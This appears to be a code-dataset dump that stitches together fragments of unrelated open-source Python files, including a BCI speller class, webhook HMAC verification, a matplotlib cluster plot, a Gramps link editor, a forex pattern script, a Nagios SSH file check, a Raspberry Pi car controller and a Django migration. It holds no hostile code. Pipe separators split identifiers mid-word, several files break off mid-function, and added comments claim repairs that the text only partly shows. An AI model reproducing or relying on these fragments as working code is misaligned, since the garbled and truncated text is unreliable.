            return f
        self.__stim_gen_kw = kw
        return decorate

    @classmethod
    def sequences(self, f):
        # Decorator: register f as the provider of trial sequences.
        self.__sequences = f
        return f

    def setup_speller(self):
        self._setup_trial()
        self._setup_input_handler()
        self._setup_experiment()

    def _setup_trial(self):
        # e.g. 'CopySpellingTrial'; the class object is resolved via eval()
        # from the names imported with `from lib.speller.trial import *`.
        trial_type = self._trial_name + 'Trial'
        self._trial = eval(trial_type)(self._view, self._trigger, self._iter,
                                       self)
        if self.__stimulus:
            self._trial._sequence = getattr(self, self.__stimulus.__name__)
        elif self.__stim_gen:
            self._trial._sequence = self._stimulus_generator
            self.__stimulus_generator = getattr(self, self.__stim_gen.__name__)

    def _setup_input_handler(self):
        input_handler_type = self._trial_name + 'InputHandler'
        self._input_handler = eval(input_handler_type)(self)

    def _setup_experiment(self):
        experiment_type = self._trial_name + 'Experiment'
        self._experiment = eval(experiment_type)(self._view, self._trial,
                                                 self.phrases,
                                                 self._input_handler,
                                                 self._flag, self._iter,
                                                 self)
        if self.__sequences:
            self._experiment._sequences = getattr(self,
                                                  self.__sequences.__name__)

    def keyboard_input(self, event):
        # Forward key events to the input handler only while the trial is
        # asking for a selection.
        if self._trial.asking:
            self._input_handler.keyboard(event)
        super(Speller, self).keyboard_input(event)

    def current_target(self):
        return self._trial.current_target

    def run(self):
        self._experiment.run()

    def on_control_event(self, data):
        """ Classifier input. """
        cls = data.get('cl_output', None)
        if cls is not None:
            self._input_handler.eeg_select(cls)

    def _stimulus_generator(self, *a, **kw):
        # Adapter installed as the trial sequence when a generator was
        # registered: wraps its output in a stimulus_sequence and runs it.
        self.stimulus_sequence(self.__stimulus_generator(*a, **kw),
                               **self.__stim_gen_kw).run()
|
andyofmelbourne/crappy-crystals | utils/gpu/__init__.py | Python | gpl-3.0 | 15 | 0 | impo | rt phasin | g
|
MSusik/invenio | invenio/modules/webhooks/signatures.py | Python | gpl-2.0 | 1,447 | 0.010366 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2014 CERN.
##
## Inven | io is free software | ; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
import re
import hmac
from hashlib import sha1
from invenio.base.globals import cfg
def get_hmac(message):
    """
    Helper function which calculates HMAC value.

    Returns the hex-encoded HMAC-SHA1 of *message*, keyed with the
    WEBHOOKS_SECRET_KEY configuration value.
    """
    key = str(cfg["WEBHOOKS_SECRET_KEY"])
    hmac_value = hmac.new(key, message, sha1).hexdigest()
    return hmac_value
def check_x_hub_signature(signature, message):
    """
    Checks X-Hub-Signature. Secret key to compare
    signature: WEBHOOKS_SECRET_KEY.

    Accepts either a bare hex digest or a 'sha1=<hexdigest>' style value
    (as sent e.g. by GitHub). Uses hmac.compare_digest so the comparison
    runs in constant time and does not leak the digest via timing.
    """
    hmac_value = get_hmac(message)
    if hmac.compare_digest(hmac_value, signature):
        return True
    idx = signature.find('=')
    if idx > -1 and hmac.compare_digest(hmac_value, signature[idx + 1:]):
        return True
    return False
ClinGen/clincoded | src/clincoded/upgrade/evidenceScore.py | Python | mit | 250 | 0 | from contentbase.upgrader import upgrade_step
@upgrade_step('evidenceScore', '1', '2')
def evidenceScore_1_2(val | ue, system):
# https://github.com/ClinGen/clincoded/issues/1507
# Add affiliation | property and update schema version
return
|
pmeier82/SpikePlot | spikeplot/plot_cluster.py | Python | mit | 3,737 | 0.002944 | # -*- coding: utf-8 -*-
#
# spikeplot - plot_cluster.py
#
# Philipp Meier <pmeier82 at googlemail dot com>
# 2011-09-29
#
"""scatter plot for clustering data"""
__docformat__ = 'restructuredtext'
__all__ = ['cluster']
##---IMPORTS
from .common import COLOURS, save_figure, check_plotting_handle, mpl, plt
##---FUNCTION
def cluster(data, data_dim=(0, 1), plot_handle=None, plot_mean=True,
            colours=None, title=None, xlabel=None, ylabel=None, filename=None,
            show=True):
    """plot a set of clusters with different colors each

    :Parameters:
        data : object
            Preferably a dictionary with ndarray entries.
        data_dim : tuple
            A 2-tuple giving the dimension (entries per datapoint/columns) to
            use for the scatter plot of the cluster.
        plot_handle : figure or axis
            A reference to a figure or axis, or None if one has to be created.
        plot_mean : bool or float
            If False, do nothing. If True or positive integer,
            plot the cluster
            means with a strong cross, if positive float, additionally plot a
            unit circle of that radius (makes sense for prewhitened pca data),
            thus interpreting the value as the std of the cluster.
            Default=True
        colours : list
            List of colors in any matplotlib conform colour representation
            Default=None
        title : str
            A title for the plot. No title if None or ''.
        xlabel : str
            A label for the x-axis. No label if None or ''.
        ylabel : str
            A label for the y-axis. No label if None or ''.
        filename : str
            It given and a valid path on the local system, save the figure.
        show : bool
            If True, show the figure.
    :Returns:
        matplotlib.figure
            Reference to the figure plotted on
    """

    # colour list: fall back to the module palette, cycling when there are
    # more clusters than colours
    if colours is None:
        col_lst = COLOURS
    else:
        col_lst = colours

    # setup Figure if necessary
    fig, ax = check_plotting_handle(plot_handle)

    # a bare array is treated as a single, unnamed cluster
    if not isinstance(data, dict):
        data = {'0':data}

    # plot single cluster members
    col_idx = 0
    for k in sorted(data.keys()):
        ax.plot(
            data[k][:, data_dim[0]],
            data[k][:, data_dim[1]],
            marker='.',
            lw=0,
            c=col_lst[col_idx % len(col_lst)])
        col_idx += 1

    # plot cluster means
    if plot_mean is not False:
        col_idx = 0
        for k in sorted(data.keys()):
            my_mean = data[k][:, data_dim].mean(axis=0)
            ax.plot(
                [my_mean[0]],
                [my_mean[1]],
                lw=0,
                marker='x',
                mfc=col_lst[col_idx % len(col_lst)],
                ms=10,
                mew=1,
                mec='k')
            # plot density estimates: a numeric plot_mean is interpreted as
            # the cluster std and drawn as a circle of that radius
            if plot_mean is not True:
                ax.add_artist(
                    mpl.patches.Ellipse(
                        xy=my_mean,
                        width=plot_mean * 2,
                        height=plot_mean * 2,
                        facecolor='none',
                        edgecolor=col_lst[col_idx % len(col_lst)]))
            col_idx += 1

    # fancy stuff
    if title is not None:
        ax.set_title(title)
    if xlabel is not None:
        ax.set_xlabel(xlabel)
    if ylabel is not None:
        ax.set_ylabel(ylabel)

    # produce plots
    if filename is not None:
        save_figure(fig, filename, '')
    if show is True:
        plt.show()
    return fig
##---MAIN
# No demo provided; importing this module is the only supported use.
if __name__ == '__main__':
    pass
|
dermoth/gramps | gramps/gui/editors/editlink.py | Python | gpl-2.0 | 9,653 | 0.002486 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2010 Doug Blank <doug.blank@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#-------------------------------------------------------------------------
#
# python modules
#
#-------------------------------------------------------------------------
from gi.repository import Gtk
import re
#-------------------------------------------------------------------------
#
# gramps modules
#
#---------------------------------------------- | ---------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.sgettext
from ..managed | window import ManagedWindow
from ..display import display_help
from ..glade import Glade
from gramps.gen.simple import SimpleAccess
from gramps.gen.const import URL_MANUAL_SECT2
#-------------------------------------------------------------------------
#
# Constants
#
#-------------------------------------------------------------------------
WIKI_HELP_PAGE = URL_MANUAL_SECT2
WIKI_HELP_SEC = _('manual|Link_Editor')
WEB, EVENT, FAMILY, MEDIA, NOTE, PERSON, PLACE, REPOSITORY, SOURCE, CITATION = list(range(10))
OBJECT_MAP = {
EVENT: "Event",
FAMILY: "Family",
MEDIA: "Media",
NOTE: "Note",
PERSON: "Person",
PLACE: "Place",
REPOSITORY: "Repository",
SOURCE: "Source",
CITATION: "Citation",
}
#-------------------------------------------------------------------------
#
# EditLink class
#
#-------------------------------------------------------------------------
class EditLink(ManagedWindow):
    def __init__(self, dbstate, uistate, track, url, callback):
        """Build and show the modal Link Editor dialog.

        :param url: initial link text, either a plain web URL or a
            ``gramps://<ObjectClass>/<prop>/<value>`` internal reference
        :param callback: stored for use when the edit is confirmed
            (invocation happens outside this method)
        """
        self.url = url
        self.dbstate = dbstate
        # SimpleAccess renders database objects as human-readable text
        self.simple_access = SimpleAccess(self.dbstate.db)
        self.callback = callback
        ManagedWindow.__init__(self, uistate, track, url, modal=True)
        self._local_init()
        self._connect_signals()
        self.show()
    def _local_init(self):
        """Load the Glade UI, populate the type combo and preset widgets
        from ``self.url``."""
        self.top = Glade()
        self.set_window(self.top.toplevel,
                        self.top.get_object("title"),
                        _('Link Editor'))
        self.setup_configs('interface.editlink', 600, 160)
        self.uri_list = self.top.get_object('link_type')
        # The order of these entries must match the WEB..CITATION index
        # constants defined at module level.
        for text in [_("Internet Address"), # 0 this order range above
                     _("Event"), # 1
                     _("Family"), # 2
                     _("Media"), # 3
                     _("Note"), # 4
                     _("Person"), # 5
                     _("Place"), # 6
                     _("Repository"), # 7
                     _("Source"), # 8
                     _("Citation"), # 9
                     ]:
            self.uri_list.append_text(text)
        self.pick_item = self.top.get_object('button1')
        self.new_button = self.top.get_object('new')
        self.edit_button = self.top.get_object('edit')
        self.selected = self.top.get_object('label1')
        self.url_link = self.top.get_object('entry1')
        self.uri_list.connect("changed", self._on_type_changed)
        self.pick_item.connect("clicked", self._on_pick_one)
        self.new_button.connect("clicked", self._on_new)
        self.edit_button.connect("clicked", self._on_edit_one)
        if self.url.startswith("gramps://"):
            # Internal reference: preselect the matching object type.
            object_class, prop, value = self.url[9:].split("/", 2)
            if object_class == "Event":
                self.uri_list.set_active(EVENT)
            elif object_class == "Family":
                self.uri_list.set_active(FAMILY)
            elif object_class == "Media":
                self.uri_list.set_active(MEDIA)
            elif object_class == "Note":
                self.uri_list.set_active(NOTE)
            elif object_class == "Person":
                self.uri_list.set_active(PERSON)
            elif object_class == "Place":
                self.uri_list.set_active(PLACE)
            elif object_class == "Repository":
                self.uri_list.set_active(REPOSITORY)
            elif object_class == "Source":
                self.uri_list.set_active(SOURCE)
            elif object_class == "Citation":
                self.uri_list.set_active(CITATION)
            # set texts:
            self.selected.set_text(self.display_link(
                object_class, prop, value))
            self.url_link.set_text("gramps://%s/%s/%s" %
                                   (object_class, prop, value))
        else:
            # Plain web address.
            self.uri_list.set_active(WEB)
            self.url_link.set_text(self.url)
        self.url_link.connect("changed", self.update_ui)
def update_ui(self, widget):
url = self.url_link.get_text()
# text needs to have 3 or more chars://and at least one char
match = re.match(r"\w{3,}://\w+", url)
if match:
self.ok_button.set_sensitive(True)
else:
self.ok_button.set_sensitive(False)
    def display_link(self, obj_class, prop, value):
        """Return a human-readable label for a gramps:// object reference."""
        return self.simple_access.display(obj_class, prop, value)
def _on_new_callback(self, obj):
object_class = obj.__class__.__name__
self.selected.set_text(self.display_link(
object_class, "handle", obj.handle))
self.url_link.set_text("gramps://%s/%s/%s" %
(object_class, "handle", obj.handle))
    def _on_new(self, widget):
        """Open an editor for a brand-new object of the selected type."""
        # local import, presumably to avoid a circular import -- keep it here
        from ..editors import EditObject
        object_class = OBJECT_MAP[self.uri_list.get_active()]
        EditObject(self.dbstate,
                   self.uistate,
                   self.track,
                   object_class,
                   callback=self._on_new_callback)
    def _on_edit_one(self, widget):
        """Open an editor for the object referenced by the entry text.

        Does nothing for plain web URLs (non gramps:// text).
        """
        from ..editors import EditObject
        uri = self.url_link.get_text()
        if uri.startswith("gramps://"):
            obj_class, prop, value = uri[9:].split("/", 2)
            EditObject(self.dbstate,
                       self.uistate,
                       self.track,
                       obj_class, prop, value)
    def _on_pick_one(self, widget):
        """Let the user pick an existing object of the selected type and
        write the resulting gramps:// reference into the dialog."""
        from ..selectors import SelectorFactory
        object_class = OBJECT_MAP[self.uri_list.get_active()]
        Select = SelectorFactory(object_class)
        uri = self.url_link.get_text()
        default = None
        if uri.startswith("gramps://"):
            # Preselect the currently referenced object in the selector,
            # resolving a gramps_id reference to its handle if needed.
            obj_class, prop, value = uri[9:].split("/", 2)
            if object_class == obj_class:
                if prop == "handle":
                    default = value
                elif (prop == "gramps_id" and
                      object_class in OBJECT_MAP.values()):
                    person = self.dbstate.db.method('get_%s_from_gramps_id',
                                                    object_class)(value)
                    if person:
                        default = person.handle
        d = Select(self.dbstate, self.uistate, self.track,
                   default=default)
        result = d.run()
        if result:
            prop = "handle"
            value = result.handle
            self.selected.set_text(self.display_link(
                object_class, prop, value))
            self.url_link.set_text("gramps://%s/%s/%s" %
                                   (object_class, prop, value))
def _on_type_changed(self, widget):
self.selected.set_text("")
if self.uri_list.get_active() == WEB:
self.url_link.set_sensitive(True)
self.pick_item.set_sensitive(False)
|
PythonProgramming/Pattern-Recognition-for-Forex-Trading | machFX10.py | Python | mit | 11,354 | 0.01189 | '''
main issue here was to global patforrec. youll probs forget.
'''
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.ticker as mticker
import matplotlib.dates as mdates
import numpy as np
from numpy import loadtxt
import time
totalStart = time.time()
date,bid,ask = np.loadtxt('GBPUSD1d.txt', unpack=True,
delimiter=',',
converters={0:mdates.strpdate2num('%Y%m%d%H%M%S')})
avgLine = ((bid+ask)/2)
patternAr = []
performanceAr = []
patForRec = []
def percentChange(startPoint, currentPoint):
    """Return the percent change from startPoint to currentPoint.

    Quirks kept for compatibility with the pattern matcher:
    - an exact 0% change is reported as 1e-9 so later math never sees 0;
    - a zero/invalid start point yields the sentinel 0.0001 instead of
      raising.
    """
    try:
        x = ((float(currentPoint) - startPoint) / abs(startPoint)) * 100.00
        if x == 0.0:
            return 0.000000001
        else:
            return x
    except (ZeroDivisionError, TypeError, ValueError):
        # was a bare 'except:'; narrowed so real programming errors
        # (NameError, KeyboardInterrupt, ...) are no longer swallowed
        return 0.0001
def patternStorage():
    '''
    The goal of patternFinder is to begin collection of %change patterns
    in the tick data. From there, we also collect the short-term outcome
    of this pattern. Later on, the length of the pattern, how far out we
    look to compare to, and the length of the compared range be changed,
    and even THAT can be machine learned to find the best of all 3 by
    comparing success rates.

    Appends one 30-point pattern to the global patternAr and the matching
    future %-change to performanceAr for every index y in [31, len-30).
    '''
    startTime = time.time()
    x = len(avgLine) - 30
    y = 31
    while y < x:
        # 30 percent-changes, all measured from the point 30 ticks back
        # (replaces the original hand-unrolled p1..p30 assignments).
        pattern = [percentChange(avgLine[y - 30], avgLine[y - 30 + i])
                   for i in range(1, 31)]
        # Soft outcome: average of the points 20-30 ticks into the future.
        outcomeRange = avgLine[y + 20:y + 30]
        currentPoint = avgLine[y]
        try:
            # sum()/len() replaces reduce(lambda ...) -- same result,
            # and works without py2-only builtins.
            avgOutcome = sum(outcomeRange) / len(outcomeRange)
        except Exception as e:
            # e.g. empty slice near the end of the series
            print(str(e))
            avgOutcome = 0
        futureOutcome = percentChange(currentPoint, avgOutcome)
        patternAr.append(pattern)
        performanceAr.append(futureOutcome)
        y += 1
    endTime = time.time()
    print(len(patternAr))
    print(len(performanceAr))
    print('Pattern storing took: %s' % (endTime - startTime))
def currentPattern():
    """Append the 30-point %-change pattern of the most recent window to
    the global patForRec list; the baseline point is avgLine[-31].

    NOTE(review): patForRec is never cleared between calls (see the module
    docstring), so repeated calls keep growing the list -- confirm intent.
    """
    baseline = avgLine[-31]
    # avgLine[-30] .. avgLine[-1], i.e. the original cp1 .. cp30 in order.
    # Also repairs a corrupted 'p | atForRec.append(cp25)' line in the
    # original hand-unrolled version.
    for idx in range(-30, 0):
        patForRec.append(percentChange(baseline, avgLine[idx]))
def graphRawFX():
    """Plot the raw bid/ask series with the spread shaded on a twin axis.

    Repairs a corrupted 'ax1.xaxis.se | t_major_formatter' line from the
    original source.
    """
    fig = plt.figure(figsize=(10, 7))
    ax1 = plt.subplot2grid((40, 40), (0, 0), rowspan=40, colspan=40)
    ax1.plot(date, bid)
    ax1.plot(date, ask)
    # show x ticks as full timestamps, rotated so they do not overlap
    ax1.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d %H:%M:%S'))
    plt.grid(True)
    for label in ax1.xaxis.get_ticklabels():
        label.set_rotation(45)
    plt.gca().get_yaxis().get_major_formatter().set_useOffset(False)
    ax1_2 = ax1.twinx()
    # shade the bid/ask spread on a secondary y axis
    ax1_2.fill_between(date, 0, (ask - bid), facecolor='g', alpha=.3)
    plt.subplots_adjust(bottom=.23)
    plt.show()
def patternRecognition():
for eachPattern in patternAr:
sim1 = 100.00 - abs(percentChange(eachPattern[0], patForRec[0]))
sim2 = 100.00 - abs(percentChange(eachPattern[1], patForRec[1]))
sim3 = 100.00 - abs(percentChange(eachPattern[2], patForRec[2]))
sim4 = 100.00 - abs(percentChange(eachPattern[3], patForRec[3]))
sim5 = 100.00 - abs(percentChange(eachPattern[ |
crazy-canux/xplugin_nagios | plugin/plugins/check-file-existence/src/check_ssh_file_existence.py | Python | gpl-2.0 | 10,389 | 0.004717 | #!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
#===============================================================================
# Filename : check_ssh_file_existence
# Author : Canux CHENG <canuxcheng@gmail.com>
# Description : Check on remote server if some files are present using SSH.
#-------------------------------------------------------------------------------
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#===============================================================================
__version__ = '0.2.4'
import hashlib
import logging as log
from pprint import pformat
import re
from datetime import datetime, timedelta
from monitoring.nagios.plugin import NagiosPluginSSH
logger = log.getLogger('plugin')
def format_time_from_arg(time_string):
    """
    Combine today's date with a HH:MM:SS string.

    :param time_string: String of the form HH:MM:SS.
    :type time_string: str
    :return: datetime anchored on the current day
    """
    parsed = datetime.strptime(time_string, '%H:%M:%S')
    today = datetime.today()
    return parsed.replace(year=today.year, month=today.month, day=today.day)
class PluginCheckFileExistence(NagiosPluginSSH):
    """
    Plugin customization class.

    Checks over SSH that at least ``--count`` files matching ``--regexp``
    exist in ``--directory``, optionally restricted to a daily
    [--stime, --etime] window. Two corrupted tokens from the source
    ('= | True' and 'de | f search_files') are repaired below.
    """
    def initialize(self):
        """Initialize plugin state and the per-service journal name."""
        super(PluginCheckFileExistence, self).initialize()
        # Use MD5 hash in pickle file name for the case you have multiple
        # service checks on the same host that use this plugin.
        pickle_pattern = '%s_%s_%s' % (self.options.hostname, self.options.regexp.pattern, self.options.directory)
        self.picklefile_pattern = hashlib.md5(pickle_pattern).hexdigest()
        self.has_check_period = False
        self.in_check_period = False
        # Daily state persisted between runs via load_data()/save_data().
        self.flags = {
            'DoneForToday': False,
            'NotYetPresent': None,
            'Files': [],
        }

    def define_plugin_arguments(self):
        """Declare the file-listing / filtering command line arguments."""
        super(PluginCheckFileExistence, self).define_plugin_arguments()
        parser_file_group = self.parser.add_argument_group('Files', 'Arguments to list and filter files.')
        parser_file_group.add_argument('-d',
                                       dest='directory',
                                       default='.',
                                       help='Directory to look files in. Default to the current directory.')
        parser_file_group.add_argument('-r',
                                       dest='regexp',
                                       default=re.compile(r'.*'),
                                       type=re.compile,
                                       help='Regexp pattern to filter files. Default to all \'.*\'.')
        parser_file_group.add_argument('-n',
                                       dest='count',
                                       type=int,
                                       default=1,
                                       help='Number of file (at least) that must be found to consider it is valid. ' \
                                            'Default to 1 occurence.')
        parser_file_group.add_argument('--stime',
                                       dest='stime',
                                       type=format_time_from_arg,
                                       help='Check start time. Check for files starting at the specified time.')
        parser_file_group.add_argument('--etime',
                                       dest='etime',
                                       type=format_time_from_arg,
                                       help='Check end time. Do not check for files above this time.')

    def verify_plugin_arguments(self):
        """Validate --stime/--etime and compute the effective check period."""
        super(PluginCheckFileExistence, self).verify_plugin_arguments()
        # Check time thresholds syntax
        if self.options.stime and self.options.etime:
            if self.options.stime >= self.options.etime:
                self.unknown('Start time cannot be >= end time, check syntax !')
            # If today's window is already over, shift it to tomorrow.
            if datetime.today() > self.options.etime:
                tomorrow = timedelta(days=1)
                self.options.stime += tomorrow
                self.options.etime += tomorrow
            logger.debug('We must take care of the time period.')
            logger.debug('\tStart time: %s' % self.options.stime)
            logger.debug('\tEnd time: %s' % self.options.etime)
            self.has_check_period = True
            if (datetime.today() > self.options.stime) and (datetime.today() < self.options.etime):
                logger.debug('We are in check period...')
                self.in_check_period = True
            else:
                logger.debug('We are not in check period...')
        elif (self.options.stime and not self.options.etime) or (not self.options.stime and self.options.etime):
            self.unknown('Missing start/end time information, check syntax !')

    def search_files(self, files):
        """Return the subset of *files* matching the configured regexp.

        :param files: iterable of file names from the remote listing
        :rtype: list
        """
        found = []
        regexp = self.options.regexp
        for file in files:
            if regexp.search(file):
                logger.debug('\tFound file \'%s\'.' % file)
                found.append(file)
        return found
plugin = PluginCheckFileExistence(description='Check on remote server if some files are present using SSH.',
version=__version__)
# Look for files on the remote server.
files = plugin.ssh.list_files(plugin.options.directory)
logger.debug('Retrieve files list:')
logger.debug(pformat(files))
# Search files using the regexp
found_files = plugin.search_files(files)
# Should we check if plugin must be executed ?
status = None
message = ''
if plugin.has_check_period:
# Check period defined
# Load previous state
try:
flags = plugin.load_data()
except IOError:
flags = plugin.flags
if plugin.in_check_period:
if flags['DoneForToday']:
status = plugin.ok
message = '%d files have already been checked today.\n'\
'The following files have been found:\n'\
'%s' % (len(flags['Files']), '\n'.join(flags['Files']))
else:
if found_files:
if len(found_files) >= plugin.options.count:
flags['Files'] = found_files
flags['DoneForToday'] = True
flags['NotYetPresent'] = None
status = plugin.ok
message = '%d files with regexp \"%s\" have been found in \"%s\".\n'\
'The following files have been found:\n'\
'%s' % (len(found_files),
plugin.options.regexp.pattern,
plugin.options.directory,
'\n'.join(found_files))
else:
status = plugin.critical
message = 'Only %d files with regexp \"%s\" have been found in \"%s\".'\
'Should be at least %d.\n' % (len(found_files),
plugin.options.regexp.pattern,
plugin.options.directory,
plugin.options.count)
else:
flags['NotYetPresent'] = True
status = plugin.ok
message = 'Files with regexp \"%s\" are not yet present in \"%s\".'\
'Verify in next check...' % |
jmdevince/cifpy3 | lib/cif/feeder/parsers/csv.py | Python | gpl-3.0 | 2,069 | 0.0029 | import csv
from ..parser import Parser
__author__ = 'James DeVincentis <james.d@hexhost.net>'
class Csv(Parser):
    """CSV feed parser: turns journal-filtered CSV rows into observables.

    Two corrupted tokens from the source ('observa | bles' and 'an | d')
    are repaired in parsefile().
    """
    def __init__(self, **kwargs):
        # NOTE(review): super().__init__ is not called and **kwargs is
        # ignored; self.file is presumably opened by the Parser base class
        # before this runs -- confirm the construction order.
        self.csv = csv.reader(self.file)

    def parsefile(self, filehandle, max_objects=1000):
        """Parse file provided by `filehandle`. Return `max_objects` at a time. This is repetitively called

        :param filehandle: Open text mode filehandle object pointing to the file to be parsed.
        :param int max_objects: Number of objects to return
        :return: List of parsed observables
        :rtype: list
        """
        self.loadjournal()
        observables = []
        # On the first call, skip rows up to the configured 'start' line.
        if self.total_objects == 0 and "start" in self.parsing_details and self.parsing_details["start"] > 1:
            for x in range(1, self.parsing_details["start"]):
                try:
                    next(self.csv)
                    self.total_objects += 1
                except StopIteration:
                    self.parsing = False
                    return observables
        objects = 0
        while objects < max_objects:
            try:
                line = next(self.csv)
            except StopIteration:
                # End of file: tell the caller parsing is finished.
                self.parsing = False
                break
            if len(line) != self.valuecount:
                # Skip comment rows silently; log any other malformed row.
                if line[0].startswith('#') or line[0].startswith(';'):
                    continue
                self.logging.debug("No Match - feed: '{3}'; contents: '{0}'; match-count: {2}; values: {1}".format(
                    line, len(self.parsing_details["values"]), len(line), self.parsing_details['feed_name'])
                )
                continue
            observable = self.create_observable_from_meta_if_not_in_journal(line)
            if observable is not None:
                observables.append(observable)
                objects += 1
            self.total_objects += 1
            # Stop early once the configured 'end' row has been reached.
            if self.ending and self.total_objects >= self.end:
                self.parsing = False
                break
        self.writejournal()
        return observables
|
lukaszo/picar_worhshop | picar/car.py | Python | apache-2.0 | 3,163 | 0.001265 | # -*- coding: UTF-8 -*-
import pigpio
class Car(object):
    """Drive a pigpio-controlled RC car: steering pins, direction pins and
    a PWM channel for speed.

    Two corrupted lines from the source ('move_backw | ard' and
    '| self._power += change_value') are repaired below.
    """

    # Names of the GPIO pin arguments accepted by __init__.
    PINS = ['left_pin', 'right_pin', 'forward_pin', 'backward_pin',
            'enable_moving', 'enable_turning']

    def __init__(self, left_pin, right_pin, forward_pin, backward_pin,
                 enable_moving, enable_turning, start_power=65):
        self._left_pin = left_pin
        self._right_pin = right_pin
        self._forward_pin = forward_pin
        self._backward_pin = backward_pin
        self._enable_moving = enable_moving
        self._enable_turning = enable_turning
        self._setup_gpio()
        self._moving_pwm_started = False
        self._power = start_power  # PWM duty cycle percentage (30..100)

    def _setup_gpio(self):
        """Configure every pin as an output and set up the speed PWM."""
        self._pi = pigpio.pi()
        self._pi.set_mode(self._left_pin, pigpio.OUTPUT)
        self._pi.set_mode(self._right_pin, pigpio.OUTPUT)
        self._pi.set_mode(self._forward_pin, pigpio.OUTPUT)
        self._pi.set_mode(self._backward_pin, pigpio.OUTPUT)
        self._pi.set_mode(self._enable_moving, pigpio.OUTPUT)
        self._pi.set_mode(self._enable_turning, pigpio.OUTPUT)
        # Express duty cycle directly in percent (0-100).
        self._pi.set_PWM_range(self._enable_moving, 100)
        self._pi.set_PWM_frequency(self._enable_moving, 100)  # channel, frequency

    def turn_left(self):
        self._pi.write(self._enable_turning, True)
        self._pi.write(self._right_pin, False)
        self._pi.write(self._left_pin, True)

    def turn_right(self):
        self._pi.write(self._enable_turning, True)
        self._pi.write(self._left_pin, False)
        self._pi.write(self._right_pin, True)

    def straight(self):
        """Release both steering pins."""
        self._pi.write(self._left_pin, False)
        self._pi.write(self._right_pin, False)
        self._pi.write(self._enable_turning, False)

    def move_forward(self):
        self._pi.write(self._backward_pin, False)
        self._pi.write(self._forward_pin, True)
        self._start_moving_pwm()

    def move_backward(self):
        self._pi.write(self._forward_pin, False)
        self._pi.write(self._backward_pin, True)
        self._start_moving_pwm()

    def faster(self, change_value=15):
        """Raise motor power by change_value, capped at 100%."""
        if self._power + change_value > 100:
            self._power = 100
        else:
            self._power += change_value
        self._change_power()

    def slower(self, change_value=15):
        """Lower motor power by change_value, floored at 30%."""
        if self._power - change_value < 30:
            self._power = 30
        else:
            self._power -= change_value
        self._change_power()

    def stop_moving(self):
        # NOTE(review): this zeroes the PWM on _enable_turning although the
        # speed PWM runs on _enable_moving -- looks like the wrong pin;
        # confirm on hardware before changing.
        self._pi.set_PWM_dutycycle(self._enable_turning, 0)
        self._pi.write(self._backward_pin, False)
        self._pi.write(self._forward_pin, False)
        self._moving_pwm_started = False

    def stop(self):
        """Stop moving and release steering."""
        self.stop_moving()
        self._pi.write(self._left_pin, False)
        self._pi.write(self._right_pin, False)
        self._pi.write(self._enable_turning, False)

    def _start_moving_pwm(self):
        # Idempotent: only start the PWM once per movement.
        if self._moving_pwm_started:
            return
        self._pi.set_PWM_dutycycle(self._enable_moving, self._power)
        self._moving_pwm_started = True

    def _change_power(self):
        self._pi.set_PWM_dutycycle(self._enable_moving, self._power)
|
obulpathi/poppy | poppy/transport/pecan/models/request/provider_details.py | Python | apache-2.0 | 1,024 | 0 | # Copyright (c) 2014 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance | with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitat | ions under the License.
from poppy.model.helpers import provider_details
def load_from_json(json_data):
    """Build a ProviderDetail model from a deserialized JSON mapping.

    Missing keys default to None via dict.get().
    """
    return provider_details.ProviderDetail(
        provider_service_id=json_data.get("id"),
        access_urls=json_data.get("access_urls"),
        status=json_data.get("status"),
        error_info=json_data.get("error_info"))
|
BartDeCaluwe/925r | ninetofiver/migrations/0072_auto_20180502_0834.py | Python | gpl-3.0 | 2,929 | 0.002048 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-05-02 08:34
from __future__ import unicode_literals
import dirtyfields.dirtyfields
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.db.models.manager
class Migration(migrations.Migration):
    # Auto-generated Django migration. Only the corrupted tokens
    # ('django.db.m | odels' and "| 'abstract'") from the source were
    # repaired; generated operations are otherwise left untouched.

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('contenttypes', '0002_remove_content_type_name'),
        ('ninetofiver', '0071_apikey_name'),
    ]

    operations = [
        migrations.CreateModel(
            name='WhereaboutDate',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
                ('starts_at', models.DateTimeField()),
                ('ends_at', models.DateTimeField()),
